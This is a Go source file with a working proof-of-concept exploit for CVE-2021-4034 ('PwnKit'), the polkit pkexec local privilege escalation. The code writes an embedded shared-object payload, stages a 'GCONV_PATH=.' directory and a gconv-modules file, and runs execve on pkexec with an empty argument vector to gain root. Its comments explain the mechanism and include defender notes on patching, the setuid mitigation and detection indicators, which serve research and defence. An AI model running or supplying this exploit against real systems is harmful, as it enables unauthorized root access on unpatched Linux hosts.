package golpe
import (
"errors"
"fmt"
"log"
"os"
"os/exec"
"syscall"
"unsafe"
)
// CVE_2021_4034 is a proof-of-concept for CVE-2021-4034 ("PwnKit"), the
// polkit pkexec local privilege escalation. It stages a shared object and a
// gconv-modules file in the current working directory and then replaces the
// running process with pkexec via a raw execve whose argument vector is empty.
//
// Returns a non-nil error if any staging step fails or if execve returns.
// If execve succeeds this function never returns, because the process image
// is replaced; as a consequence the deferred cleanups below run ONLY on the
// failure path. On a successful run payload.so, the "GCONV_PATH=." directory
// and the "lol" directory are left on disk in the working directory, which is
// useful forensic evidence for responders.
//
// Defender notes:
//   - Fix: install the vendor polkit update for CVE-2021-4034. The commonly
//     published interim mitigation is to drop the setuid bit from the pkexec
//     binary (chmod 0755).
//   - Detection: an execve of pkexec with argc == 0, a setuid process started
//     with GCONV_PATH (or PATH=GCONV_PATH=...) in its environment, gconv-modules
//     files in user-writable directories, and the auth-log message
//     "The value for the SHELL variable was not found in the /etc/shells file"
//     are the indicators most widely reported for this CVE.
//
// Depends on so_data and ExtractFileFromString, which are defined elsewhere in
// this package; their exact behaviour is not visible from this file.
func CVE_2021_4034() (err error) {
var (
// argv stays nil. &argv below points at the slice header, whose first word is
// a nil pointer, so the kernel receives an empty argument vector (argc == 0),
// the precondition this CVE depends on.
argv []string = nil
// Environment passed to pkexec. Note that the first entry carries no '=' and
// that PATH is set to a directory literally named "GCONV_PATH=." — both are
// visible in the log line emitted before the execve.
envv = []string{
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
}
// Name of the directory created in the working directory below.
gconv_path_eq = "GCONV_PATH=."
// Contents written to lol/gconv-modules; it points glibc's iconv at
// ../payload, i.e. the payload.so written next to it.
gconv_module_content = "module UTF-8// INTERNAL ../payload 2\n"
)
// Decode the embedded shared object. so_data and ExtractFileFromString are
// package-level names not shown here; presumably so_data is a compressed,
// text-encoded blob — verify against their definitions.
data, err := ExtractFileFromString(so_data)
if err != nil {
return fmt.Errorf("ExtractFileFromString: %v", err)
}
// An empty result is treated as a decode failure rather than written out.
if len(data) == 0 {
return fmt.Errorf("failed to decompress payload.so")
}
// payload.so is written world-readable/writable/executable (0777) into the
// current directory; the cleanup is deferred and therefore only runs if the
// execve below fails.
err = os.WriteFile("payload.so", data, 0777)
if err != nil {
return fmt.Errorf("write payload.so: %v", err)
}
defer os.RemoveAll("payload.so")
// Stage the "GCONV_PATH=." directory (only if it does not already exist).
if _, err = os.Stat(gconv_path_eq); err != nil {
if err = os.Mkdir(gconv_path_eq, 0755); err != nil {
return fmt.Errorf("mkdir %s: %v", gconv_path_eq, err)
}
defer os.RemoveAll(gconv_path_eq)
// The *os.File returned by os.Create is discarded and never closed; the
// descriptor lives until execve replaces the process or the process exits.
// A bare return here propagates the os.Create error via the named result.
_, err = os.Create(gconv_path_eq + "/lol")
if err != nil {
return
}
// without +x bit, pkexec complains no such file or directory
err = os.Chmod(gconv_path_eq+"/lol", 0755)
if err != nil {
return fmt.Errorf("chmod lol: %v", err)
}
}
// Stage lol/gconv-modules (only if the "lol" directory does not already
// exist). Unlike the two artifacts above, this directory is never removed.
if _, err = os.Stat("lol"); err != nil {
if err = os.Mkdir("lol", 0755); err != nil {
return fmt.Errorf("mkdir lol: %v", err)
}
/*
Quoted from the glibc manual on iconv module configuration:
Returning to the example above where one has written a module to directly convert from ISO-2022-JP to EUC-JP and back. All that has to be done is to put the new module, let its name be `ISO2022JP-EUCJP.so`, in a directory and add a file gconv-modules with the following content in the same directory:
module ISO-2022-JP// EUC-JP// ISO2022JP-EUCJP 1
module EUC-JP// ISO-2022-JP// ISO2022JP-EUCJP 1
*/
err = os.WriteFile("lol/gconv-modules", []byte(gconv_module_content), 0777)
if err != nil {
return fmt.Errorf("write gconv-modules: %v", err)
}
}
// Locate pkexec on the caller's PATH; a bare return propagates the LookPath
// error through the named result.
pkexec_path, err := exec.LookPath("pkexec")
if err != nil {
return
}
argv0 := pkexec_path
// Build the C-style pointers execve expects: a NUL-terminated path and a
// NULL-terminated array of NUL-terminated environment strings.
argv0p, err := syscall.BytePtrFromString(argv0)
if err != nil {
return fmt.Errorf("argv0p: %v", err)
}
envvp, err := syscall.SlicePtrFromStrings(envv)
if err != nil {
return fmt.Errorf("envvp: %v", err)
}
// envv is reassigned here after envvp has already been built from the
// earlier value, so this Go slice only feeds the log line below.
envv = []string{
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
"\x00",
}
log.Printf("argv0: %s, envv: %v", argv0, envv)
// Replace the current process with pkexec via a raw execve (bypassing
// os/exec and the runtime's fork/exec wrappers). The errno returned by
// RawSyscall is assigned to err but immediately overwritten on the next
// line, so the specific failure reason is not reported to the caller.
_, _, err = syscall.RawSyscall(syscall.SYS_EXECVE,
uintptr(unsafe.Pointer(argv0p)),
uintptr(unsafe.Pointer(&argv)),
uintptr(unsafe.Pointer(&envvp[0])))
// Only reachable if execve failed; a successful execve never returns.
return errors.New("if you see this, CVE-2021-4034 exploit has failed")
}